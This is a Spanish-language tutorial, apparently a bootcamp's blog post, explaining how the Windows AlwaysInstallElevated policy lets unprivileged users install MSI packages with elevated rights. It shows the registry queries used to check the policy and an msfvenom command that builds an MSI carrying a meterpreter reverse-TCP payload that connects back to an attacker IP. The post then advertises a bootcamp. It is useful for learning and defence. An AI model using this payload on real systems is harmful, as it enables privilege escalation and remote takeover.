¿Cómo funciona el Always install elevated?

El Always install elevated es una política que le permite a los usuarios no privilegiados instalar aplicaciones que requieren acceso a directorios y claves de registro para las que normalmente no tienen acceso de escritura. Esto es equivalente a otorgar derechos administrativos completos y, aunque Microsoft desaconseja su uso, todavía es posible explotarlo en ciertas situaciones.

¿Qué es el Always install elevated?

Cuando la configuración de Always install elevated está habilitada, cualquier software que intentes instalar se ejecutará con los permisos más altos, lo que significa que puede realizar cambios en el sistema que requieren privilegios administrativos.

La instalación elevada es necesaria para ciertos programas que realizan cambios profundos en el sistema, como modificaciones en la configuración del sistema, instalación de controladores o actualizaciones de software críticas. Sin embargo, también puede representar un riesgo de seguridad si se utilizan instaladores maliciosos o si se instalan programas de fuentes no confiables.

¿Cómo funciona el Always install elevated?

Es posible comprobar si se encuentra habilitada la política de Always install elevated consultando algunas claves. Veamos:

HKCU

La primera clave del Always install elevated está dada por el comando: C:\> reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated. Este se utiliza para consultar el valor de registro llamado «AlwaysInstallElevated», ubicado en la clave del registro «HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer» en un sistema Windows.

Cuando se ejecuta el comando desde la línea de comandos (C:\> representa la ubicación de la línea de comandos), se accede al Editor del Registro de Windows y se busca la clave «HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer». A continuación, se busca el valor «Always Install Elevated» dentro de esa clave y se muestra el resultado de la consulta.

El valor «AlwaysInstallElevated» está relacionado con la instalación elevada de paquetes MSI (Microsoft Installer) y su configuración determina si los paquetes MSI se instalan con privilegios elevados, incluso si el usuario no tiene privilegios de administrador.

El resultado de la consulta puede ser:

• Si el valor «Always Install Elevated» existe y está configurado en 1, significa que los paquetes MSI se instalarán siempre con privilegios elevados.
• Si el valor «Always Install Elevated» no existe o está configurado en 0, significa que los paquetes MSI se instalarán con los privilegios correspondientes al usuario actual.

HKLM

La segunda clave está dada por el comando C:\> reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated, que es similar al comando anterior. La diferencia radica en la ubicación del Registro que se está consultando.

En este caso, se está consultando la ubicación «HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer» en lugar de «HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer».

La ubicación «HKLM» hace alusión a HKEY_LOCAL_MACHINE, que almacena información y configuraciones relacionadas con el sistema y todas las cuentas de usuario en el equipo.

Por lo tanto, la consulta «HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer» busca la configuración de la directiva «AlwaysInstallElevated» en el nivel del equipo en lugar de en el contexto específico del usuario actual. Esto significa que la configuración de la directiva puede aplicarse a todos los usuarios del sistema en lugar de solo al usuario actual.

Generación de paquetes MSI

La generación de MSI se puede hacer tanto con frameworks conocidos como Metasploit, como con herramientas puntuales para esta funcionalidad:

$ msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.1.109 lport=1234 -f msi > 1.msi

Tratemos de entender el comando que acabamos de ver:

• -p windows/meterpreter/reverse_tcp: especifica el payload que se utilizará, en este caso, «meterpreter/reverse_tcp», para establecer una conexión inversa TCP con el equipo objetivo en Windows.
• lhost=192.168.1.109: aquí debes reemplazar «192.168.1.109» por la dirección IP de tu máquina local o la máquina a la que deseas que el payload le envíe las conexiones inversas.
• lport=1234: establece el número de puerto en el que escuchará tu máquina para las conexiones de Meterpreter. Puedes reemplazar «1234» por el número de puerto que desees.
• -f msi: indica que el formato de salida del payload será un archivo MSI. El archivo MSI es un tipo de archivo utilizado para la instalación de software en sistemas Windows.
• > 1.msi: redirecciona la salida del comando a un archivo llamado «1.msi». Aquí puedes elegir cualquier nombre para el archivo MSI resultante.

¿Quieres seguir aprendiendo?

Como has podido ver, empler la política de Always Install elevated es un arma de doble filo. Si quieres saber más sobre temáticas de ciberseguridad y comprender mucho mejor cómo funcionan este tipo de configuraciones, accede a nuestro Ciberseguridad Full Stack Bootcamp para convertirte en todo un profesional IT. Con esta formación íntegra de alta intensidad, nuestros profesores expertos en el sector te enseñarán todo lo necesario a nivel tanto teórico como práctico para impulsar tu carrera en cuestión de meses. ¡Accede ahora para solicitar más información y da el paso que cambiará tu vida!